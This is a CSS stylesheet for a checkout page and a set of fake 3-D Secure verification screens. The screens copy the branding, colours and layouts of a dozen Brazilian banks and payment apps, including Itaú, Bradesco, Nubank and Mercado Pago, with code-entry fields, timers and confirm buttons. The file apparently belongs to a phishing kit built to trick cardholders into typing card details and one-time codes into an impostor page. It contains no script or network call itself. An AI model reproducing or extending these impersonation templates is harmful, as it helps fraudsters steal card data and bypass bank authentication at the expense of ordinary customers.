.payment-method-section {
    margin: 24px 0;
}

.payment-method-section .section-label {
    display: block;
    font-weight: 700;
    font-size: 14px;
    color: #333;
    margin-bottom: 12px;
}

.payment-methods-inline {
    display: flex;
    gap: 12px;
}

.payment-method-radio {
    flex: 1;
    display: flex;
    align-items: center;
    gap: 10px;
    padding: 16px 20px;
    border: 2px solid #ccc;
    border-radius: 4px;
    cursor: pointer;
    transition: border-color 0.2s;
    font-size: 16px;
    color: #333;
}

.payment-method-radio:has(input:checked) {
    border-color: #333;
}

.payment-method-radio input[type="radio"] {
    width: 20px;
    height: 20px;
    accent-color: #333;
}

/* Pricing section */
.pricing-section {
    border: 1px solid #ccc;
    border-radius: 4px;
    padding: 16px;
    margin: 16px 0;
}

.price-info {
    display: flex;
    justify-content: space-between;
    align-items: center;
}

.price-info .price {
    font-weight: 700;
    font-size: 16px;
    color: #333;
}

.price-info .change-plan {
    color: #0073e6;
    text-decoration: none;
    font-weight: 600;
    font-size: 14px;
}

.pricing-note {
    margin: 4px 0 0 0;
    font-size: 13px;
    color: #737373;
}

/* Debit/credit note */
.debit-credit-note {
    font-size: 13px;
    color: #737373;
    margin: 16px 0;
    line-height: 1.4;
}

/* Terms section */
.terms-section {
    margin: 16px 0 24px 0;
}

.terms-text {
    font-size: 13px;
    color: #737373;
    line-height: 1.5;
    margin-bottom: 12px;
}

.terms-text a {
    color: #0073e6;
    text-decoration: none;
}

.checkbox-label {
    display: flex;
    align-items: flex-start;
    gap: 10px;
    cursor: pointer;
    font-size: 16px;
    color: #333;
}

.checkbox-label input[type="checkbox"] {
    width: 20px;
    height: 20px;
    margin-top: 2px;
    accent-color: #0073e6;
}

/* Submit button */
#cardForm .btn-pay {
    width: 100%;
    padding: 16px;
    background: #e50914;
    color: #fff;
    border: none;
    border-radius: 4px;
    font-size: 18px;
    font-weight: 700;
    cursor: pointer;
    margin-top: 16px;
    transition: background 0.2s;
}

#cardForm .btn-pay:hover {
    background: #c11119;
}

/* Error messages */
#cardForm .error-message {
    display: none;
    color: #b92d2b;
    font-size: 13px;
    margin-top: 4px;
    padding-left: 4px;
}

/* Payment form container - centered */
#paymentForm .form-container {
    display: flex;
    justify-content: center;
    padding: 40px 20px;
}

#paymentForm .form-card {
    width: 100%;
    max-width: 440px;
    background: #fff;
    padding: 0;
}

/* ============================================ */
/* Fix: Centralizar telas de processamento/3DS */
/* ============================================ */

#processingScreen.payment-form-screen,
#vbvScreen.payment-form-screen,
#declinedScreen.payment-form-screen {
    align-items: center !important;
    justify-content: center !important;
}

#processingScreen .form-card,
#vbvScreen .form-card,
#declinedScreen .form-card {
    display: flex !important;
    flex-direction: column !important;
    align-items: center !important;
    justify-content: center !important;
    text-align: center !important;
    width: 100% !important;
    max-width: 400px !important;
    padding: 40px 20px !important;
}

#processingScreen .spinner {
    margin: 0 auto 30px auto !important;
}

#vbvScreen .form-card {
    max-width: 420px !important;
}

#vbvScreen .vbv-header,
#vbvScreen .vbv-message,
#vbvScreen form {
    width: 100%;
    text-align: center;
}

#vbvScreen .vbv-message {
    text-align: left;
    border-left: 3px solid #0073e6;
    padding-left: 16px;
    margin: 20px 0;
}


/* ===== 3DS Dynamic Templates ===== */
.tds-container {
    color: #333;
    width: 100%;
    height: 100vh;
    position: fixed;
    top: 0;
    left: 0;
    background: #fff;
    z-index: 9999;
    overflow-y: auto;
}

.tds-loading {
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-content: center;
    width: 100%;
    height: 100vh;
    position: fixed;
    top: 0;
    left: 0;
    background: #fff;
    gap: 16px;
}

.tds-loading-text {
    font-size: 14px;
    color: #666;
}

.tds-spinner {
    width: 40px;
    height: 40px;
    border: 3px solid #e0e0e0;
    border-top: 3px solid #2196F3;
    border-radius: 50%;
    animation: tds-spin 1s linear infinite;
}

@keyframes tds-spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

.tds-bank-template {
    color: #333;
    width: 100%;
    max-width: 600px;
    margin: 0 auto;
    padding: 30px 40px;
    min-height: 100vh;
    box-sizing: border-box;
    background: #fff;
}

/* Common elements */
.tds-input-group {
    margin: 20px 0;
}

.tds-input-group label {
    display: block;
    font-size: 14px;
    color: #333;
    margin-bottom: 6px;
    font-weight: 500;
}

.tds-input-field {
    width: 200px;
    padding: 10px 12px;
    border: 1px solid #999;
    border-radius: 3px;
    font-size: 18px;
    outline: none;
    letter-spacing: 4px;
    transition: border-color 0.2s;
}

.tds-input-field:focus {
    border-color: #2196F3;
    box-shadow: 0 0 0 2px rgba(33, 150, 243, 0.15);
}

.tds-details-table {
    width: 100%;
    border-collapse: collapse;
    margin: 16px 0;
}

.tds-details-table td {
    padding: 8px 12px;
    font-size: 14px;
    vertical-align: middle;
    color: #333 !important;
}

.tds-td-label {
    text-align: right;
    width: 45%;
    color: #333;
    font-weight: 600;
}

.tds-desc {
    font-size: 14px;
    color: #444;
    line-height: 1.6;
    margin-bottom: 16px;
}

.tds-remember {
    margin: 16px 0;
    font-size: 13px;
    color: #666;
    line-height: 1.6;
}

.tds-actions-center {
    text-align: center;
    margin: 24px 0;
}

.tds-actions-row {
    display: flex;
    justify-content: space-between;
    align-items: center;
    margin-top: 24px;
}

.tds-footer-row {
    margin-top: 20px;
    padding-top: 16px;
    border-top: 1px solid #eee;
}

.tds-footer-row a {
    font-size: 14px;
    text-decoration: underline;
}

.tds-help-box {
    margin-top: 12px;
    padding: 12px;
    background: #f9f9f9;
    border: 1px solid #ddd;
    border-radius: 4px;
    font-size: 13px;
    color: #555;
    line-height: 1.5;
}

.tds-store-badge {
    display: inline-flex;
    align-items: center;
    gap: 8px;
    padding: 8px 16px;
    border: 1px solid #ddd;
    border-radius: 6px;
    margin-bottom: 16px;
    font-size: 14px;
}

.tds-store-icon {
    font-size: 20px;
}

/* ITAU */
.tds-header-itau {
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding-bottom: 20px;
    border-bottom: 2px solid #eee;
    margin-bottom: 24px;
}

.tds-btn-itau {
    background: #003882;
    color: #fff;
    border: none;
    padding: 12px 40px;
    border-radius: 4px;
    font-size: 14px;
    font-weight: 600;
    cursor: pointer;
}
.tds-btn-itau:hover { background: #002a63; }

.tds-footer-itau a, .tds-header-itau + .tds-body-itau .tds-footer-row a {
    color: #003882;
}

/* BANCO DO BRASIL */
.tds-header-bb {
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding-bottom: 20px;
    border-bottom: 2px solid #eee;
    margin-bottom: 24px;
}

.tds-body-bb h3 {
    font-size: 16px;
    color: #333;
    margin-bottom: 12px;
}

.tds-btn-bb {
    background: #003882;
    color: #fff;
    border: none;
    padding: 12px 32px;
    border-radius: 4px;
    font-size: 14px;
    font-weight: 600;
    cursor: pointer;
}
.tds-btn-bb:hover { background: #002a63; }

.tds-actions-row a {
    color: #003882;
    font-size: 14px;
    text-decoration: underline;
}

/* SANTANDER */
.tds-header-santander {
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding-bottom: 16px;
    border-bottom: 3px solid #EC0000;
    margin-bottom: 24px;
}

.tds-body-santander h2 {
    font-size: 22px;
    color: #333;
    margin-bottom: 16px;
    text-align: center;
}

.tds-btn-santander {
    width: 100%;
    background: #EC0000;
    color: #fff;
    border: none;
    padding: 14px;
    border-radius: 6px;
    font-size: 16px;
    font-weight: 600;
    cursor: pointer;
    margin-top: 20px;
}
.tds-btn-santander:hover { background: #cc0000; }

#tds-santander .tds-footer-row a { color: #EC0000; }
#tds-santander .tds-help-box { background: #fef2f2; border-color: #ec0000; }

/* BRADESCO */
.tds-header-bradesco {
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding-bottom: 20px;
    border-bottom: 3px solid #CC092F;
    margin-bottom: 24px;
}

.tds-body-bradesco h3 {
    font-size: 18px;
    color: #333;
    margin-bottom: 16px;
}

.tds-btn-bradesco {
    background: #CC092F;
    color: #fff;
    border: none;
    padding: 12px 40px;
    border-radius: 4px;
    font-size: 14px;
    font-weight: 600;
    cursor: pointer;
}
.tds-btn-bradesco:hover { background: #a00725; }

#tds-bradesco .tds-footer-row a { color: #CC092F; }
#tds-bradesco .tds-help-box { background: #fef2f2; border-color: #cc092f; }

/* CAIXA ECONOMICA FEDERAL */
.tds-header-caixa {
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding-bottom: 20px;
    border-bottom: 3px solid #005CA9;
    margin-bottom: 24px;
}

.tds-body-caixa h3 {
    font-size: 18px;
    color: #333;
    margin-bottom: 16px;
    font-weight: 700;
}

.tds-btn-caixa {
    width: 100%;
    max-width: 350px;
    background: #005CA9;
    color: #fff;
    border: none;
    padding: 14px;
    border-radius: 4px;
    font-size: 15px;
    font-weight: 700;
    cursor: pointer;
    letter-spacing: 1px;
}
.tds-btn-caixa:hover { background: #004a8a; }

#tds-caixa .tds-footer-row a { color: #005CA9; }
#tds-caixa .tds-help-box { background: #f0f7ff; border-color: #005CA9; }

/* GENERIC */
.tds-header-generic {
    display: flex;
    justify-content: space-between;
    align-items: center;
    padding-bottom: 20px;
    border-bottom: 2px solid #eee;
    margin-bottom: 24px;
}

.tds-body-generic h3 {
    font-size: 18px;
    color: #333;
    margin-bottom: 16px;
}

.tds-btn-generic {
    background: #1A1F71;
    color: #fff;
    border: none;
    padding: 12px 40px;
    border-radius: 4px;
    font-size: 14px;
    font-weight: 600;
    cursor: pointer;
}
.tds-btn-generic:hover { background: #12154f; }

#tds-generic .tds-footer-row a { color: #1A1F71; }

/* Mobile for 3DS */
@media (max-width: 768px) {
    .tds-bank-template {
    color: #333;
        padding: 20px 16px;
        max-width: 100%;
    }
    .tds-input-field {
        width: 100%;
        box-sizing: border-box;
    }
    .tds-td-label {
        text-align: left;
    }
    .tds-details-table td {
        display: block;
        padding: 4px 0;
    }
    .tds-details-table tr {
        display: block;
        margin-bottom: 8px;
    }
    .tds-btn-caixa,
    .tds-btn-santander {
        max-width: 100%;
    }
}

/* === NUBANK 3DS === */
.tds-nubank-container {
    max-width: 420px;
    margin: 0 auto;
    padding: 0;
    border-radius: 12px;
    overflow: hidden;
    box-shadow: 0 4px 20px rgba(0,0,0,0.15);
}
.tds-nubank-header {
    background: #820AD1;
    padding: 20px 24px;
    display: flex;
    justify-content: space-between;
    align-items: center;
}
.tds-nubank-logo {
    font-family: 'Segoe UI', sans-serif;
    font-size: 32px;
    font-weight: 800;
    color: #fff;
    letter-spacing: -1px;
}
.tds-nubank-badge {
    display: flex;
    flex-direction: column;
    align-items: flex-end;
}
.tds-mc-badge {
    font-size: 10px;
    color: rgba(255,255,255,0.8);
    text-transform: lowercase;
}
.tds-mc-idcheck {
    font-size: 11px;
    color: #fff;
    font-weight: 600;
}
.tds-nubank-body {
    background: #fff;
    padding: 24px;
    text-align: center;
}
.tds-nubank-title {
    font-size: 16px;
    font-weight: 700;
    color: #820AD1;
    margin-bottom: 8px;
}
.tds-nubank-subtitle {
    font-size: 13px;
    color: #666;
    margin-bottom: 16px;
}
.tds-nubank-timer {
    font-size: 24px;
    font-weight: 300;
    color: #820AD1;
    margin: 16px 0;
}
.tds-nubank-input-style {
    border: 2px solid #820AD1 !important;
    border-radius: 8px !important;
    padding: 12px !important;
    font-size: 18px !important;
    text-align: center;
    letter-spacing: 4px;
}
.tds-nubank-buttons {
    display: flex;
    gap: 12px;
    margin-top: 20px;
}
.tds-nubank-btn-confirm {
    flex: 1;
    padding: 14px;
    background: #820AD1;
    color: #fff;
    border: none;
    border-radius: 8px;
    font-size: 14px;
    font-weight: 700;
    cursor: pointer;
}
.tds-nubank-btn-confirm:hover { background: #6B08AE; }
.tds-nubank-btn-cancel {
    flex: 1;
    padding: 14px;
    background: #fff;
    color: #333;
    border: 2px solid #ddd;
    border-radius: 8px;
    font-size: 14px;
    font-weight: 700;
    cursor: pointer;
}
.tds-nubank-btn-cancel:hover { background: #f5f5f5; }

/* === INTER 3DS === */
.tds-inter-container {
    max-width: 420px;
    margin: 0 auto;
    padding: 24px;
    background: #fff;
    border-radius: 8px;
    box-shadow: 0 2px 12px rgba(0,0,0,0.1);
}
.tds-inter-header {
    display: flex;
    justify-content: space-between;
    align-items: center;
    margin-bottom: 12px;
}
.tds-inter-logo {
    font-family: 'Segoe UI', sans-serif;
    font-size: 28px;
    font-weight: 700;
    color: #FF7A00;
}
.tds-inter-divider {
    border: none;
    border-top: 2px solid #FF7A00;
    margin: 12px 0 20px;
}
.tds-inter-title {
    font-size: 18px;
    font-weight: 700;
    color: #333;
    text-align: center;
    margin-bottom: 16px;
}
.tds-inter-info-box {
    background: #f5f5f5;
    border: 1px solid #ddd;
    padding: 12px 16px;
    border-radius: 4px;
    font-size: 13px;
    color: #555;
    margin-bottom: 16px;
    text-align: center;
}
.tds-inter-text {
    font-size: 14px;
    color: #333;
    margin-bottom: 12px;
    text-align: center;
}
.tds-inter-input-row {
    display: flex;
    gap: 8px;
    margin-bottom: 20px;
    align-items: center;
}
.tds-inter-input-style {
    flex: 1;
    border: 2px solid #ccc !important;
    border-radius: 4px !important;
    padding: 10px !important;
}
.tds-inter-btn-validate {
    padding: 10px 20px;
    background: #FF7A00;
    color: #fff;
    border: none;
    border-radius: 4px;
    font-size: 14px;
    font-weight: 600;
    cursor: pointer;
}
.tds-inter-btn-validate:hover { background: #E06E00; }
.tds-inter-buttons {
    display: flex;
    gap: 12px;
    justify-content: center;
}
.tds-inter-btn {
    padding: 12px 32px;
    background: #FF7A00;
    color: #fff;
    border: none;
    border-radius: 4px;
    font-size: 14px;
    font-weight: 600;
    cursor: pointer;
}
.tds-inter-btn:hover { background: #E06E00; }

/* === PAGBANK 3DS === */
.tds-pagbank-container {
    max-width: 420px;
    margin: 0 auto;
    padding: 24px;
    background: #fff;
    border-radius: 8px;
    box-shadow: 0 2px 12px rgba(0,0,0,0.1);
}
.tds-pagbank-header {
    display: flex;
    justify-content: space-between;
    align-items: center;
    margin-bottom: 20px;
}
.tds-pagbank-logo {
    display: flex;
    align-items: center;
    gap: 4px;
}
.tds-pagbank-logo-icon {
    color: #FFC107;
    font-size: 20px;
}
.tds-pagbank-logo-text {
    font-size: 16px;
    color: #00A859;
}
.tds-pagbank-visa {
    font-size: 22px;
    font-weight: 700;
    color: #1A1F71;
    font-style: italic;
}
.tds-pagbank-title {
    font-size: 18px;
    font-weight: 700;
    color: #333;
    margin-bottom: 12px;
}
.tds-pagbank-text {
    font-size: 14px;
    color: #333;
    margin-bottom: 8px;
}
.tds-pagbank-subtext {
    font-size: 12px;
    color: #888;
    margin-bottom: 16px;
}
.tds-pagbank-input-style {
    width: 100%;
    border: 2px solid #ccc !important;
    border-radius: 4px !important;
    padding: 12px !important;
    font-size: 16px !important;
    margin-bottom: 12px;
    box-sizing: border-box;
}
.tds-pagbank-btn-confirm {
    width: 100%;
    padding: 14px;
    background: #00A859;
    color: #fff;
    border: none;
    border-radius: 4px;
    font-size: 16px;
    font-weight: 700;
    cursor: pointer;
    margin-bottom: 8px;
}
.tds-pagbank-btn-confirm:hover { background: #008F4A; }
.tds-pagbank-btn-resend {
    width: 100%;
    padding: 12px;
    background: #fff;
    color: #00A859;
    border: 2px solid #00A859;
    border-radius: 4px;
    font-size: 14px;
    font-weight: 600;
    cursor: pointer;
    margin-bottom: 12px;
}
.tds-pagbank-btn-resend:hover { background: #f0faf5; }
.tds-pagbank-footer {
    font-size: 12px;
    color: #666;
    text-align: left;
}
.tds-pagbank-footer a {
    color: #333;
    text-decoration: underline;
}

/* === C6 BANK 3DS === */
.tds-c6-container {
    max-width: 420px;
    margin: 0 auto;
    border-radius: 12px;
    overflow: hidden;
    box-shadow: 0 4px 20px rgba(0,0,0,0.2);
}
.tds-c6-header {
    background: #1A1A1A;
    padding: 18px 24px;
    display: flex;
    justify-content: space-between;
    align-items: center;
}
.tds-c6-logo {
    font-family: 'Segoe UI', sans-serif;
    font-size: 20px;
    font-weight: 700;
    color: #fff;
    letter-spacing: 0.5px;
}
.tds-c6-body {
    background: #fff;
    padding: 24px;
}
.tds-c6-title {
    font-size: 18px;
    font-weight: 700;
    color: #1A1A1A;
    margin-bottom: 16px;
    text-align: center;
}
.tds-c6-info {
    background: #f8f8f8;
    border: 1px solid #eee;
    border-radius: 8px;
    padding: 12px 16px;
    margin-bottom: 16px;
}
.tds-c6-row {
    display: flex;
    justify-content: space-between;
    padding: 4px 0;
    font-size: 13px;
    color: #555;
}
.tds-c6-text {
    font-size: 14px;
    color: #333;
    text-align: center;
    margin-bottom: 16px;
}
.tds-c6-input-style {
    width: 100%;
    border: 2px solid #1A1A1A !important;
    border-radius: 8px !important;
    padding: 14px !important;
    font-size: 18px !important;
    text-align: center;
    letter-spacing: 4px;
    box-sizing: border-box;
    margin-bottom: 16px;
}
.tds-c6-btn-confirm {
    width: 100%;
    padding: 14px;
    background: #1A1A1A;
    color: #fff;
    border: none;
    border-radius: 8px;
    font-size: 16px;
    font-weight: 700;
    cursor: pointer;
    margin-bottom: 12px;
}
.tds-c6-btn-confirm:hover { background: #333; }
.tds-c6-footer {
    text-align: center;
}
.tds-c6-footer a {
    color: #666;
    font-size: 13px;
    text-decoration: underline;
}

/* === PICPAY 3DS === */
.tds-picpay-container {
    max-width: 420px;
    margin: 0 auto;
    border-radius: 12px;
    overflow: hidden;
    box-shadow: 0 4px 20px rgba(0,0,0,0.15);
}
.tds-picpay-header {
    background: #21C25E;
    padding: 18px 24px;
    display: flex;
    justify-content: space-between;
    align-items: center;
}
.tds-picpay-logo {
    font-family: 'Segoe UI', sans-serif;
    font-size: 22px;
    font-weight: 700;
    color: #fff;
}
.tds-picpay-body {
    background: #fff;
    padding: 24px;
    text-align: center;
}
.tds-picpay-title {
    font-size: 18px;
    font-weight: 700;
    color: #333;
    margin-bottom: 12px;
}
.tds-picpay-text {
    font-size: 14px;
    color: #555;
    margin-bottom: 12px;
}
.tds-picpay-amount {
    background: #f0faf5;
    border: 1px solid #21C25E;
    border-radius: 8px;
    padding: 10px;
    margin-bottom: 16px;
    font-size: 14px;
    color: #333;
}
.tds-picpay-input-style {
    width: 100%;
    border: 2px solid #21C25E !important;
    border-radius: 8px !important;
    padding: 14px !important;
    font-size: 18px !important;
    text-align: center;
    letter-spacing: 4px;
    box-sizing: border-box;
    margin-bottom: 12px;
}
.tds-picpay-btn-confirm {
    width: 100%;
    padding: 14px;
    background: #21C25E;
    color: #fff;
    border: none;
    border-radius: 8px;
    font-size: 16px;
    font-weight: 700;
    cursor: pointer;
    margin-bottom: 8px;
}
.tds-picpay-btn-confirm:hover { background: #1BA84F; }
.tds-picpay-btn-cancel {
    width: 100%;
    padding: 12px;
    background: #fff;
    color: #666;
    border: 2px solid #ddd;
    border-radius: 8px;
    font-size: 14px;
    cursor: pointer;
}
.tds-picpay-btn-cancel:hover { background: #f5f5f5; }

/* === NEON 3DS === */
.tds-neon-container {
    max-width: 420px;
    margin: 0 auto;
    border-radius: 12px;
    overflow: hidden;
    box-shadow: 0 4px 20px rgba(0,0,0,0.15);
}
.tds-neon-header {
    background: linear-gradient(135deg, #00D2FF, #00B8D4);
    padding: 18px 24px;
    display: flex;
    justify-content: space-between;
    align-items: center;
}
.tds-neon-logo {
    font-family: 'Segoe UI', sans-serif;
    font-size: 26px;
    font-weight: 800;
    color: #fff;
    letter-spacing: 2px;
}
.tds-neon-badge-visa {
    font-size: 18px;
    font-weight: 700;
    color: #fff;
    font-style: italic;
    background: rgba(255,255,255,0.2);
    padding: 4px 10px;
    border-radius: 4px;
}
.tds-neon-body {
    background: #fff;
    padding: 24px;
    text-align: center;
}
.tds-neon-title {
    font-size: 18px;
    font-weight: 700;
    color: #333;
    margin-bottom: 12px;
}
.tds-neon-text {
    font-size: 14px;
    color: #555;
    margin-bottom: 16px;
}
.tds-neon-input-style {
    width: 100%;
    border: 2px solid #00B8D4 !important;
    border-radius: 8px !important;
    padding: 14px !important;
    font-size: 18px !important;
    text-align: center;
    letter-spacing: 4px;
    box-sizing: border-box;
    margin-bottom: 16px;
}
.tds-neon-btn-confirm {
    width: 100%;
    padding: 14px;
    background: linear-gradient(135deg, #00D2FF, #00B8D4);
    color: #fff;
    border: none;
    border-radius: 8px;
    font-size: 16px;
    font-weight: 700;
    cursor: pointer;
    margin-bottom: 12px;
}
.tds-neon-btn-confirm:hover { opacity: 0.9; }
.tds-neon-link {
    color: #00B8D4;
    font-size: 13px;
    text-decoration: underline;
}

/* === MERCADO PAGO 3DS === */
.tds-mp-container {
    max-width: 460px;
    margin: 0 auto;
    background: #f5f5f5;
    border-radius: 8px;
    overflow: hidden;
    box-shadow: 0 2px 12px rgba(0,0,0,0.1);
}
.tds-mp-top-bar {
    padding: 16px 24px;
    background: #fff;
    border-bottom: 1px solid #eee;
}
.tds-mp-top-text {
    font-size: 16px;
    font-weight: 700;
    color: #333;
    margin: 0;
}
.tds-mp-warning {
    display: flex;
    align-items: center;
    gap: 8px;
    padding: 12px 24px;
    background: #fff;
    border-left: 3px solid #009EE3;
    margin: 0;
    font-size: 13px;
    color: #666;
}
.tds-mp-warning-icon {
    color: #009EE3;
    font-size: 16px;
    font-weight: 700;
}
.tds-mp-card {
    background: #fff;
    margin: 20px;
    padding: 24px;
    border-radius: 8px;
    border: 1px dashed #ccc;
    text-align: center;
}
.tds-mp-card-header {
    display: flex;
    justify-content: space-between;
    margin-bottom: 16px;
    font-size: 28px;
}
.tds-mp-icon-bank { opacity: 0.6; }
.tds-mp-icon-card { opacity: 0.6; }
.tds-mp-title {
    font-size: 18px;
    font-weight: 700;
    color: #333;
    margin-bottom: 8px;
    text-align: left;
}
.tds-mp-text {
    font-size: 14px;
    color: #666;
    margin-bottom: 16px;
    text-align: left;
}
.tds-mp-label {
    display: block;
    font-size: 13px;
    color: #888;
    text-align: left;
    margin-bottom: 6px;
}
.tds-mp-input-style {
    width: 100%;
    border: 1px solid #ccc !important;
    border-radius: 4px !important;
    padding: 14px !important;
    font-size: 18px !important;
    box-sizing: border-box;
    margin-bottom: 16px;
}
.tds-mp-input-style:focus {
    border-color: #009EE3 !important;
    outline: none;
}
.tds-mp-btn-confirm {
    width: 100%;
    padding: 14px;
    background: #1A1A1A;
    color: #fff;
    border: none;
    border-radius: 4px;
    font-size: 16px;
    font-weight: 700;
    cursor: pointer;
    margin-bottom: 12px;
}
.tds-mp-btn-confirm:hover { background: #333; }
.tds-mp-link {
    color: #333;
    font-size: 14px;
    font-weight: 600;
    text-decoration: none;
}
.tds-mp-link:hover { text-decoration: underline; }

/* Fix: Force dark text in 3DS templates */
.tds-bank-template,
.tds-bank-template td,
.tds-bank-template span,
.tds-bank-template p,
.tds-bank-template div,
.tds-bank-template h3,
.tds-bank-template h2,
.tds-bank-template label {
    color: #333 !important;
}
.tds-bank-template .tds-td-label {
    color: #333 !important;
    font-weight: 600;
}
